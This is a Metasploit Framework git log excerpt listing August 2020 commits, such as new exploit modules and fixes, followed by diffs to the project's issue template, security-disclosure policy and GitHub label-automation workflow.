2020-08-25 17:45:30 -05:00
Spencer McIntyre d1baf9677e Use nmod.vprint_error to handle peer correctly 2020-08-25 17:43:07 -04:00
Spencer McIntyre a4a0a3ab23 Allow scanner modules to skip hosts on fail_with 2020-08-25 17:38:40 -04:00
Ege Balcı 9745385346 More PE validation methods added 2020-08-26 00:13:30 +03:00
h00die 537be9054d spacing and a to an 2020-08-25 16:17:37 -04:00
h00die 4ba3c95e8a fix follow param 2020-08-25 16:13:27 -04:00
Metasploit 5368536d1a automatic module_metadata_base.json update 2020-08-25 09:16:49 -05:00
Christophe De La Fuente 0052da9d15 Land #14043', fix jupyter-login when scanning non-Jupyter hosts 2020-08-25 16:05:53 +02:00
Metasploit b2e38eb582 automatic module_metadata_base.json update 2020-08-25 08:47:46 -05:00
Spencer McIntyre 9bd687edcd Land #14034, telpho10_credential_dump: Prevent traversal in untar 2020-08-25 09:35:32 -04:00
dwelch-r7 84c9e95073 Land #14045, Reload module after toggling feature
Reload module after toggling feature
2020-08-25 14:16:02 +01:00
C4ssandre 3336040f2d Adding a new privilege escalation exploit for windows.
New files and folders:

- metasploit-framework/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb

- metasploit-framework/data/exploits/drunkpotato/

- metasploit-framework/external/source/exploits/drunkpotato/
2020-08-25 14:27:41 +02:00
Alan Foster 37fd5dee27 Reload module after toggling features 2020-08-25 12:27:25 +01:00
dwelch-r7 6e4ec6fbf3 Land #14041, Fix features help command
Fix features help command
2020-08-25 10:08:34 +01:00
cn-kali-team f26133bef0 add dingtalk's code 2020-08-25 12:06:57 +08:00
cn-kali-team 736511f930 remove dingtalk_plugins 2020-08-25 12:06:30 +08:00
Spencer McIntyre e75bd31a70 Fix jupyter-login when scanning non-Jupyter hosts 2020-08-24 16:02:35 -04:00
Metasploit c087ef3fa7 automatic module_metadata_base.json update 2020-08-24 14:51:45 -05:00
Shelby Pace d7ecb08eca Land #14039, prefer cc in rtld_execl_priv_esc 2020-08-24 14:40:19 -05:00
Alan Foster 6066bd87cb Fix features help command 2020-08-24 17:31:04 +01:00
William Vu f08349982d Use CheckModule scanner in java_rmi_server exploit 2020-08-24 10:11:03 -05:00
Brendan Coles 786d59d360 Use AutoCheck mixin and prefer cc over gcc 2020-08-24 11:47:50 +00:00
Spencer McIntyre 2228cef857 Land #13979, Fixed segment_injector.rb x64 shellcode 2020-08-21 17:16:46 -04:00
Spencer McIntyre f69facc96b Fix the syntax and placement of the stack alignment instruction 2020-08-21 17:09:06 -04:00
Metasploit 27456ab1a6 automatic module_metadata_base.json update 2020-08-21 15:54:51 -05:00
Shelby Pace 841d488667 Land #13985, add Cisco ssh dos module 2020-08-21 15:45:27 -05:00
Shelby Pace cd351a22b1 fix msftidy warnings 2020-08-21 15:37:05 -05:00
Metasploit 2443d38a8d automatic module_metadata_base.json update 2020-08-21 15:15:17 -05:00
Shelby Pace c578fde89c Land #13982, add cisco 7937g ssh privesc 2020-08-21 15:04:24 -05:00
Shelby Pace 39284d4263 align logging line, fix msftidy_docs warning 2020-08-21 14:55:45 -05:00
debifrank 22a09b4f1d Merge pull request #1 from space-r7/cisco-13985
add randomize ssh cred function
2020-08-21 14:25:23 -04:00
Shelby Pace 06f0e2ee92 add randomize ssh cred function 2020-08-21 13:13:33 -05:00
Metasploit 3dc6e3d2fb automatic module_metadata_base.json update 2020-08-21 12:48:51 -05:00
debifrank 28068cd85c Update cisco_7937g_dos.md 2020-08-21 13:43:14 -04:00
debifrank 33524c0cbf Create cisco_7937g_ssh_privesc.py 2020-08-21 13:40:53 -04:00
debifrank 8ea1f5acc2 Delete cisco_7937g_ssh_privesc.py 2020-08-21 13:40:17 -04:00
debifrank eda50d2a20 Delete cisco_7937g_ssh_privesc.md 2020-08-21 13:39:41 -04:00
adfoster-r7 5a26aa602e Land #14014, improve squid_pivot_scanning's handling of http response codes 2020-08-21 18:39:05 +01:00
debifrank 7598c9ec80 Create cisco_7937g_ssh_privesc.md 2020-08-21 13:39:00 -04:00
Christophe De La Fuente 4d3e641a09 Make it work again 2020-08-21 19:22:10 +02:00
h00die bba98d4f16 fix spec 2020-08-21 11:32:26 -04:00
Brendan Coles 37a06756cc telpho10_credential_dump: Prevent traveral in untar 2020-08-21 15:30:55 +00:00
Metasploit 586f2443af automatic module_metadata_base.json update 2020-08-21 09:32:32 -05:00
Shelby Pace 5bcdaa50d6 Land #13984, add cisco 7937g dos module 2020-08-21 09:21:46 -05:00
Shelby Pace 1abe6ad32b msftidy, module name fixes 2020-08-21 09:11:37 -05:00
Shelby Pace e74a8f38e9 misaligned except statement 2020-08-21 09:01:45 -05:00
adfoster-r7 38d81106fe Land #14033, add cgranleese-r7 to the mailmap 2020-08-21 12:54:00 +01:00
cgranleese-r7 c70ab56c90 Add cgranleese-r7 to the mailmap 2020-08-21 11:18:25 +01:00
0x44434241 178bc3fe50 Serve the public trust. Protect the innocent. Tell noobs to delete necessary parameters. Uphold the law. 2020-08-21 08:47:05 +09:00
0x44434241 935403d937 Applying rubocop suggestions. 2020-08-21 08:35:20 +09:00
0x44434241 06cbf9a86c Applying suggested fixes. 2020-08-21 08:20:21 +09:00
Jeffrey Martin 9a64e3cd38 Land #13913, [GSoC] Specs for the SQLi library 2020-08-20 17:43:11 -05:00
Spencer McIntyre 1d7e74b5b6 Use technique constants to make the code more readable 2020-08-20 15:54:00 -04:00
h00die 4338a02bbd docs 2020-08-20 14:47:34 -04:00
h00die 26a83d5d5c rubocop 2020-08-20 14:31:18 -04:00
h00die c8a541c187 pre rubocop 2020-08-20 14:27:51 -04:00
Ege Balcı 138c951052 New PE loader mechanics, PE characteristics detection and several bug fixes 2020-08-20 20:35:32 +03:00
Metasploit 6e8e6676b2 Bump version of framework to 6.0.3 2020-08-20 12:02:45 -05:00
Spencer McIntyre b0cdb8f5d2 Fix missing parameters when using specific getsystem techniques 2020-08-20 11:29:04 -04:00
Niboucha Redouane 43501cc92c rubocop / remove newline at EOF 2020-08-20 15:50:18 +02:00
Spencer McIntyre f3fa41858e Add the new getsystem technique definition 2020-08-20 09:18:39 -04:00
0x44434241 02e6e3feda Adding documentation for auxiliary/scanner/http/squid_pivot_scanning. 2020-08-20 17:41:03 +09:00
Niboucha Redouane c83ec8ea04 Add Artica Proxy RCE+Auth bypass module 2020-08-20 02:15:58 +02:00
Alan Foster 43ecb41575 Use and semantics when searching for text 2020-08-19 15:08:55 +01:00
Tim W eabc59e5ed fix disown 2020-08-19 00:04:14 +08:00
Tim W dce83ad859 cleanup properly 2020-08-18 17:42:56 +08:00
Tim W 53b2db78a0 getroot -> make writable 2020-08-18 16:18:38 +08:00
Tim W e65e7e21f2 fix newlines and cleanup 2020-08-18 15:56:05 +08:00
Tim W 6fad6f8e8d fix check method 2020-08-18 15:56:05 +08:00
Tim W 0e4fcd7379 CVE-2020-9839 2020-08-18 15:56:01 +08:00
0x44434241 d50ed2eb37 Better handling of Squid HTTP response codes.
The previous version has a bug where HTTP codes that are not [200, 401, 404],
or the word "Zero" is not included in the response body(??), the valid open
port is not printed to the user. This patch fixes that and improves outut.

This commit improves the resilience of this module by looking at the HTTP
response header 'X-Squid-Error', which has static strings from an enum struct
documented here: http://www.squid-cache.org/Doc/code/err__type_8h.html

If the client receives an error from Squid that is not handled, the error type
will now also be printed for the user (eg: ERR_READ_TIMEOUT).

Previously, the module would also output (almost) every IP:PORT pair, even when
they are closed or forbidden by Squid ACL. This has been moved to be a verbose
option, so that non-verbose port-scanning prints a significantly shorter list
for human consumption.

As (among others) HTTP 3xx redirects were not previously displayed to users,
the redirect location is now also printed in the output. The server header is
printed for all open ports where available, and stored in the database.
2020-08-18 12:57:18 +09:00
debifrank 9c90741a79 Rename cisco_7937G_ssh_privesc.py to cisco_7937g_ssh_privesc.py 2020-08-17 20:26:01 -04:00
debifrank 97dd5e2239 Rename cisco_7937G_ssh_privesc.md to cisco_7937g_ssh_privesc.md 2020-08-17 20:25:33 -04:00
debifrank 92129415ad Rename cisco_7937G_DoS.md to cisco_7937g_dos.md 2020-08-17 20:25:02 -04:00
debifrank c19836b7d5 Rename cisco_7937G_DoS.py to cisco_7937g_dos.py 2020-08-17 20:24:34 -04:00
debifrank cfea0db83c Rename cve_2020_16139.py to cisco_7937g_dos_reboot.py 2020-08-17 20:24:17 -04:00
debifrank 3cc8e163e3 Update and rename cve-2020-16139.md to cisco_7937g_dos_reboot.md 2020-08-17 20:23:48 -04:00
debifrank f43443240b Update and rename cve-2020-16138.md to cisco_7937G_DoS.md 2020-08-17 20:22:24 -04:00
debifrank 9906c931a2 Rename cve_2020_16138.py to cisco_7937G_DoS.py 2020-08-17 20:21:33 -04:00
debifrank fc08076240 Update and rename cve_2020_16137.py to cisco_7937G_ssh_privesc.py 2020-08-17 20:20:35 -04:00
debifrank 57d0e318cb Update and rename cve-2020-16137.md to cisco_7937G_ssh_privesc.md 2020-08-17 20:19:47 -04:00
Christophe De La Fuente 99d633c478 Bump ruby_smb version 2020-08-17 15:07:45 +02:00
Christophe De La Fuente 4e7a609976 Merge remote-tracking branch 'upstream/master' into windows_secretsdump 2020-08-17 15:05:49 +02:00
Pedro Ribeiro 54f2a2d7f0 Merge branch 'master' of https://github.com/pedrib/metasploit-framework 2020-08-16 00:02:23 +07:00
Pedro Ribeiro f810f43cf6 changes as requested 2020-08-16 00:02:16 +07:00
debifrank 82857c0a36 Update cve_2020_16137.py 2020-08-14 17:47:04 -04:00
debifrank b65c49aa25 Update cve_2020_16137.py 2020-08-14 17:43:38 -04:00
debifrank 7eba463769 Update cve_2020_16138.py 2020-08-14 17:39:24 -04:00
debifrank 1e50ca7d30 Update cve_2020_16139.py 2020-08-14 17:36:43 -04:00
debifrank 9d3da31411 Update cve_2020_16139.py
catch unintended request exceptions
2020-08-14 16:18:47 -04:00
debifrank 0608025e26 Add files via upload 2020-08-14 14:45:54 -04:00
debifrank b608f7fed7 Delete CVE-2020-16137.py 2020-08-14 14:45:36 -04:00
debifrank 0cfcaa3aa0 Update and rename CVE-2020-16137.md to cve-2020-16137.md 2020-08-14 14:45:10 -04:00
debifrank 9d08b29358 Rename CVE-2020-16139.md to cve-2020-16139.md 2020-08-14 14:20:49 -04:00
debifrank c730eb0021 Rename CVE-2020-16138.md to cve-2020-16138.md 2020-08-14 14:20:27 -04:00
debifrank 921e3142c5 Add files via upload 2020-08-14 12:48:08 -04:00
debifrank ae065530f1 Delete CVE-2020-16138.py 2020-08-14 12:47:55 -04:00
debifrank 7e6ef0d713 Update CVE-2020-16138.md 2020-08-14 12:46:37 -04:00
debifrank e001839dcb Update CVE-2020-16138.md 2020-08-14 12:45:38 -04:00
debifrank 7d125c9741 Add files via upload 2020-08-14 12:16:52 -04:00
debifrank ffa23ba850 Delete CVE-2020-16139.py 2020-08-14 12:16:22 -04:00
debifrank 0e0bdc4f98 Update CVE-2020-16139.md 2020-08-14 12:15:53 -04:00
debifrank b4689dfa2d Update CVE-2020-16139.md
WIP
2020-08-14 10:12:39 -04:00
Tim W 60fcaf06a2 rubocop 2020-08-14 16:10:40 +08:00
Tim W b5e465641b CVE-2020-9850 external source 2020-08-14 16:10:40 +08:00
Tim W 1eaf66dab1 CVE-2020-9850 2020-08-14 16:10:34 +08:00
Michael-ZecOps 5877c79538 Force stack alignment 2020-08-14 01:16:20 +03:00
Christophe De La Fuente c819540d88 Add documentation 2020-08-13 17:47:51 +02:00
Christophe De La Fuente 1f9fb97c4e Some fixes and improvements after testing against older Windows 2020-08-13 17:47:51 +02:00
Christophe De La Fuente b79a441a16 Update Windows registry parser library
- rename it and move it to lib/msf/util/windows_registry_parser.rb
- refactor some statements
- raise ArgumentError when the sub-keys are not the expected one
- add logic for the RI records
2020-08-13 17:47:51 +02:00
Christophe De La Fuente 24d002b9e0 Fix Msf::Post::Windows::Priv#decrypt_secret_data
Fix the size caclculation of the decrypted data
2020-08-13 17:47:50 +02:00
Christophe De La Fuente 86656b77ee Add reporting and fix some encoding issues 2020-08-13 17:47:50 +02:00
Christophe De La Fuente 6656376a41 Small fixes in RegistryParser library 2020-08-13 17:47:50 +02:00
Christophe De La Fuente cd65d69cd9 Cleanup module 2020-08-13 17:47:50 +02:00
Christophe De La Fuente 0ce7ee6acd Add registry_parser library 2020-08-13 17:47:50 +02:00
Christophe De La Fuente 0e0690276f Add Windows Secrets Dump module 2020-08-13 17:47:50 +02:00
debifrank 1e244ddaec Add files via upload
Linted with msftidy_docs.rb
2020-08-13 09:57:17 -04:00
debifrank 8fe7417d1b Delete CVE-2020-16137.md
Linting
2020-08-13 09:56:58 -04:00
debifrank b461f4ede8 Add files via upload
Linted with msftidy_docs.rb
2020-08-13 09:56:30 -04:00
debifrank 45ef9f9324 Delete CVE-2020-16138.md
Linting
2020-08-13 09:56:08 -04:00
debifrank 27d889a599 Add files via upload
Linted with msftidy_docs.rb
2020-08-13 09:55:37 -04:00
debifrank f6581b9518 Delete CVE-2020-16139.md
Linting
2020-08-13 09:55:14 -04:00
debifrank d1afe60262 Add files via upload
Linted with autopep8
2020-08-13 09:52:21 -04:00
debifrank dada2abaad Delete CVE-2020-16139.py
Linting
2020-08-13 09:52:04 -04:00
debifrank a21907fcc6 Add files via upload
Linted with autopep8
2020-08-13 09:51:24 -04:00
debifrank 4434e37a09 Delete CVE-2020-16138.py
linting
2020-08-13 09:51:03 -04:00
debifrank 0a025123e9 Add files via upload
Linted with autopep8
2020-08-13 09:50:33 -04:00
debifrank 2a739ed5eb Delete CVE-2020-16137.py
Linting
2020-08-13 09:50:09 -04:00
Ege Balcı b95c708eec Merge pull request #2 from smcintyre-r7/pr/13980/fixes
Validate the PE file early on to raise errors
2020-08-13 09:09:37 +03:00
Spencer McIntyre cc21e5e50d Validate the PE file early on to raise errors 2020-08-12 17:32:12 -04:00
debifrank 796041ddf4 Update CVE-2020-16137.md 2020-08-12 12:37:08 -04:00
debifrank b5fb4800af Update CVE-2020-16138.md 2020-08-12 12:36:25 -04:00
debifrank b65f87e0c1 Update CVE-2020-16139.md 2020-08-12 12:35:55 -04:00
debifrank cc7dd2179a Add files via upload
Documentation for CVE-2020-16139
2020-08-12 12:34:43 -04:00
debifrank 271daa67d8 Add files via upload
Documentation for CVE-2020-16138
2020-08-12 12:34:01 -04:00
debifrank dcce728012 Add files via upload
Documentation for CVE-2020-16137
2020-08-12 12:33:19 -04:00
Ege Balcı 01c1a65f85 Merge pull request #1 from smcintyre-r7/pr/13980/fixes
Fix the Metasm architecture issue
2020-08-12 19:12:25 +03:00
debifrank 884b0ec897 Update CVE-2020-16139.py
Removed jest, included more useful information
2020-08-12 11:25:32 -04:00
debifrank d43e071a7e Update CVE-2020-16137.py
Removed jest and included more useful information.
2020-08-12 11:24:20 -04:00
Spencer McIntyre e65fa7eb26 Fix the Metasm architecture issue 2020-08-12 10:43:51 -04:00
Ege Balcı 65643ff40c Reflective PE Payloads Added 2020-08-12 14:38:56 +03:00
debifrank a77931c479 Update CVE-2020-16139.py 2020-08-11 10:51:58 -04:00
debifrank e5e8c19575 Update CVE-2020-16137.py 2020-08-11 10:49:55 -04:00
debifrank 70fc0b3375 Update CVE-2020-16138.py 2020-08-11 10:41:58 -04:00
debifrank a17d29b6a2 CVE-2020-16138
Targets the Cisco Unified IP Conference Station 7937G vulnerability CVE-2020-16138 causing a DoS condition.
2020-08-11 10:40:15 -04:00
debifrank 78a7e8ae96 Update CVE-2020-16139.py 2020-08-11 10:32:37 -04:00
debifrank 18fdbfd917 Update CVE-2020-16139.py 2020-08-11 10:30:29 -04:00
debifrank 16a00ea338 Cisco 7937G DoS Reset Attack
Python module for metasploit that targets the Cisco 7937G Conference Station and vulnerability CVE-2020-16139
2020-08-11 10:29:28 -04:00
debifrank 599bfa00be Update CVE-2020-16137.py 2020-08-11 09:50:17 -04:00
debifrank e193c33ec3 SSH Exploit against the Cisco 7937G
Coincides with CVE-2020-16137
2020-08-11 09:46:01 -04:00
Michael-ZecOps f043e4b9b4 More space optimization while at it 2020-08-11 00:45:24 +03:00
Michael-ZecOps 10a0d43da4 Fixed segment_injector.rb x64 shellcode 2020-08-11 00:16:57 +03:00
Spencer McIntyre 7ffbecefa6 The HttpProxyType option is not support for Python so deregister it 2020-08-10 14:52:18 -04:00
Spencer McIntyre 48e0610bae Add authentication support to the Python Meterpreter 2020-08-10 13:24:55 -04:00
cn-kali-team 0a3d3074a5 remove dingtalk code 2020-08-08 22:08:20 +08:00
cn-kali-team 7f63a5be06 add dingtalk_notifier plugins 2020-08-08 22:08:02 +08:00
Pedro Ribeiro ae88555a51 Rockwell updates based on feedback 2020-08-08 15:57:44 +07:00
Niboucha Redouane e4b77616fa Minor formatting (rubocop -a) 2020-08-08 03:49:29 +02:00
Niboucha Redouane 1f17b07746 use Timecop, separate query_proc from sqli_obj, and address other issues in the specs 2020-08-08 03:30:12 +02:00
Pedro Ribeiro 033cd8031d Add factorytalk exploit 2020-08-07 22:30:11 +07:00
Pedro Ribeiro 1a4c120e7e Merge pull request #22 from rapid7/master
sdsd
2020-08-07 22:21:44 +07:00
María Belén Tualombo Chimbo b2640d40ee downcase improvement for actions tab completion 2020-07-31 13:59:14 -04:00
Pedro Ribeiro dbc9258d92 Merge pull request #21 from rapid7/master
aaa
2020-07-31 00:00:33 +07:00
María Belén Tualombo Chimbo 9d09e7c2b7 pull request changes requestested for the automatic action commands system 2020-07-30 11:41:34 -04:00
María Belén Tualombo Chimbo b710cfae95 [GSoC] Ev2 - Easier actions interaction system for modules implemented 2020-07-29 11:46:30 -04:00
Niboucha Redouane f48ed5027f test #call_function, and not methods that might be implemented on specific DBMS only 2020-07-27 16:38:07 +02:00
Niboucha Redouane 89fef9f9fe Refactor and fix some specs, avoid sleeping in time-based shared examples 2020-07-27 03:15:16 +02:00
Niboucha Redouane 854df7e93b Add shared examples for SQLi::Common, and some tests for MySQLi 2020-07-23 18:54:20 +02:00
Pedro Ribeiro 7543f06e53 Merge pull request #20 from rapid7/master
fdfdfd
2020-07-02 11:35:51 +07:00
cn-kali-team 55c4dcd751 add keyword to help 2020-06-17 20:52:23 +08:00
cn-kali-team 32c3dd5071 Original code style 2020-06-08 18:00:46 +08:00
cn-kali-team 6a0e4110d8 Original code style 2020-06-08 17:56:29 +08:00
cn-kali-team 5e61750c89 add Session notified to DingTalk 2020-06-08 15:24:04 +08:00
Noam Rathaus c856aa2749 If the report is empty, exit gracefully 2020-05-17 18:22:42 +03:00
Noam Rathaus 016c261a76 Verify that database is ready for usage 2020-05-17 18:11:03 +03:00
Noam Rathaus 70bb057885 Check for 'hostname' value report error if empty 2020-05-17 18:08:55 +03:00
nrathaus 37b4b50d6d Rename function for clarity 2020-04-12 09:14:07 +03:00
nrathaus 8067f511ce beSECURE Integration 2020-04-12 08:56:17 +03:00
Quentin Kaiser a348a8c851 Add version check. 2020-02-17 12:24:28 +01:00
Quentin Kaiser 3b2fa468e9 Edit credit. 2019-02-22 19:46:04 +01:00
Quentin Kaiser 04616267f2 Pulse Secure client credentials extraction and decryption post module. 2019-02-04 16:07:57 +01:00
4759 changed files with 110652 additions and 28070 deletions
+9 -15
View File
@@ -37,24 +37,18 @@ What should happen?
What happens instead?
You might also want to check the last ~1k lines of
`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
`~/.msf4/logs/framework.log` for relevant stack traces
## System stuff
### Metasploit version
Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).
### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)
## Additional Information
If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.
### OS
What OS are you running Metasploit on?
If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outisde `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.
1. Start `msfconsole`
2. Run the command `set loglevel 3`
3. Take the steps necessary recreate your issue
4. Run the `debug` command
5. Copy all the output below the `===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===` line and make sure to **REMOVE ANY SENSITIVE INFORMATION.**
6. Replace these instructions and the paragraph above with the output from step 5.
+35
View File
@@ -0,0 +1,35 @@
# Reporting security issues
Thanks for your interest in making Metasploit more secure! If you feel
that you have found a security issue involving Metasploit, Meterpreter,
Recog, or any other Rapid7 open source project, you are welcome to let
us know in the way that's most comfortable for you.
## Via ZenDesk
You can click on the big blue button at [Rapid7's Vulnerability
Disclosure][r7-vulns] page, which will get you to our general
vulnerability reporting system. While this does require a (free) ZenDesk
account to use, you'll get regular updates on your issue as our software
support teams work through it. As it happens [that page][r7-vulns] also
will tell you what to expect when it comes to reporting vulns, how fast
we'll fix and respond, and all the rest, so it's a pretty good read
regardless.
## Via email
If you're more of a traditionalist, you can email your finding to
security@rapid7.com. If you like, you can use our [PGP key][pgp] to
encrypt your messages, but we certainly don't mind cleartext reports
over email.
## NOT via GitHub Issues
Please don't! Disclosing security vulnerabilities to public bug trackers
is kind of mean, even when it's well-intentioned, since you end up
dropping 0-day on pretty much everyone right out of the gate. We'd prefer
you didn't!
[r7-vulns]:https://www.rapid7.com/security/disclosure/
[pgp]:https://keybase.io/rapid7/pgp_keys.asc?fingerprint=9a90aea0576cbcafa39c502ba5e16807959d3eda
-125
View File
@@ -1,125 +0,0 @@
# Configuration for Github App - https://github.com/dessant/label-actions
#
# Note: Be aware of the edge cases of YAML when writing multiline strings:
# - https://yaml-multiline.info/
# - https://github.com/dessant/label-actions/issues/1
pulls:
actions:
attic:
close: true
comment: |
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it `attic` and closed it for now.
What does this generally mean? It could be one or more of several things:
- It doesn't look like there has been any activity on this pull request in a while
- We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
- Sometimes the implementation isn't quite right and a different approach is necessary.
We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
needs-docs:
comment: |
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
- [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
- [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
- [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
needs-linting:
comment: |
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
```
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
```
You can automate most of these changes with the `-a` flag:
```
rubocop -a <directory or file>
```
Please update your branch after these have been made, and reach out if you have any problems.
needs-unique-branch:
close: true
comment: |
Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
Please create a new branch in your fork of framework and resubmit this from that branch.
If you are using Git on the command line that may look like:
```
# Checkout the master branch
git checkout master
# Create a new branch for your feature
git checkout -b <BRANCH_NAME>
# Add your new files
git add modules/my-cool-new-module
# Commit your changes with a relevant message
git commit
# Push your changes to GitHub
git push origin <BRANCH_NAME>
# Now browse to the following URL and create your pull request!
# - https://github.com/rapid7/metasploit-framework/pulls
```
This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
Please do resubmit from a unique branch, we greatly value your contribution! :tada:
needs-testing-environment:
comment: |
Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
To help unblock this pull request, please:
- Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
- Or comment guided steps on how to set up our environment for testing this module
- Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
Once there's a clear path for testing and evaluating this module, we can progress with this further.
needs-pull-request-template:
close: false
comment: |
When creating a pull request, please ensure that the default pull request template has been updated with the required details.
issues:
actions:
termux:
comment: |
Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
However, Metasploit reportedly does work with Termux.
Refer to the following for more information:
* https://wiki.termux.com/wiki/Metasploit_Framework
* termux/termux-packages/issues/715
needs-issue-template:
close: true
comment: |
When creating an issue, please ensure that the default issue template has been updated with the required details.
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
potato:
close: true
comment: |
When creating an issue, please ensure that the default issue template has been updated with the required details.
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
+217
View File
@@ -0,0 +1,217 @@
name: Labels
on:
pull_request_target:
types: [labeled]
issues:
types: [labeled]
jobs:
handle-labels:
runs-on: ubuntu-latest
steps:
- uses: actions/github-script@v3
with:
github-token: ${{secrets.GITHUB_TOKEN}}
script: |
// NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
// the multiline comment strings in the following config. When editing this file, using JavaScript
// syntax highlighting might be easier.
//
// This script has intentionally been inlined instead of using third-party Github actions for both
// security and performance reasons.
const allConfig = {
pullRequests: {
attic: {
close: true,
comment: `
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it \`attic\` and closed it for now.
What does this generally mean? It could be one or more of several things:
- It doesn't look like there has been any activity on this pull request in a while
- We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
- Sometimes the implementation isn't quite right and a different approach is necessary.
We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
`
},
'needs-docs': {
close: false,
comment: `
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
- [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
- [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
- [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
`
},
'needs-linting': {
close: false,
comment: `
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
\`\`\`
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
\`\`\`
You can automate most of these changes with the \`-a\` flag:
\`\`\`
rubocop -a <directory or file>
\`\`\`
Please update your branch after these have been made, and reach out if you have any problems.
`
},
'needs-unique-branch': {
close: true,
comment: `
Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
Please create a new branch in your fork of framework and resubmit this from that branch.
If you are using Git on the command line that may look like:
\`\`\`
# Checkout the master branch
git checkout master
# Create a new branch for your feature
git checkout -b <BRANCH_NAME>
# Add your new files
git add modules/my-cool-new-module
# Commit your changes with a relevant message
git commit
# Push your changes to GitHub
git push origin <BRANCH_NAME>
# Now browse to the following URL and create your pull request!
# - https://github.com/rapid7/metasploit-framework/pulls
\`\`\`
This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
Please do resubmit from a unique branch, we greatly value your contribution! :tada:
`
},
'needs-testing-environment': {
close: false,
comment: `
Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
To help unblock this pull request, please:
- Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
- Or comment guided steps on how to set up our environment for testing this module
- Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
Once there's a clear path for testing and evaluating this module, we can progress with this further.
`
},
'needs-pull-request-template': {
close: false,
comment: `
When creating a pull request, please ensure that the default pull request template has been updated with the required details.
`
},
},
issues: {
// Termux issues are usually user error. However they may describe issues within modules/framework itself,
// and for this reason they are not closed automatically.
termux: {
close: false,
comment: `
Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
However, Metasploit reportedly does work with Termux.
Refer to the following for more information:
* https://wiki.termux.com/wiki/Metasploit_Framework
* termux/termux-packages/issues/715
`
},
// Used for issues that have had low effort applied, haven't followed the issue template, and there's not enough
// information to warrant staying open
'needs-issue-template': {
close: true,
comment: `
When creating an issue, please ensure that the default issue template has been updated with the required details:
https://github.com/rapid7/metasploit-framework/issues/new/choose
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
`
},
// Used for issues that have attempted to provide some details, but more information is required. This can be
// useful for older issues, or issues that have been raised without following the issue template fully and have
// useful comments present that stop it from being closed outright.
'needs-more-information': {
close: false,
comment: `
It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
This includes:
- All of the item points within this [tempate](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
- The result of the \`debug\` command in your Metasploit console
- Screenshots showing the issues you're having
- Exact replication steps
The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.
`
},
// Used for issues that have zero effort applied, potentially bot related
// https://github.com/rapid7/metasploit-framework/pull/13280#issuecomment-616842090
potato: {
close: true,
comment: `
When creating an issue, please ensure that the default issue template has been updated with the required details:
https://github.com/rapid7/metasploit-framework/issues/new/choose
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
`
},
'ruby-3.0.0': {
close: true,
comment: `
This issue appears to be related to Ruby 3.0.0. At this time Metasploit does not support Ruby 3.0.0.
Please try using Ruby 2.7.x with Metasploit.
Closing this issue as a duplicate of #14666 - which aims to track this feature request.
`
},
}
};
const issueType = context.eventName === 'issues' ? 'issues' : 'pullRequests';
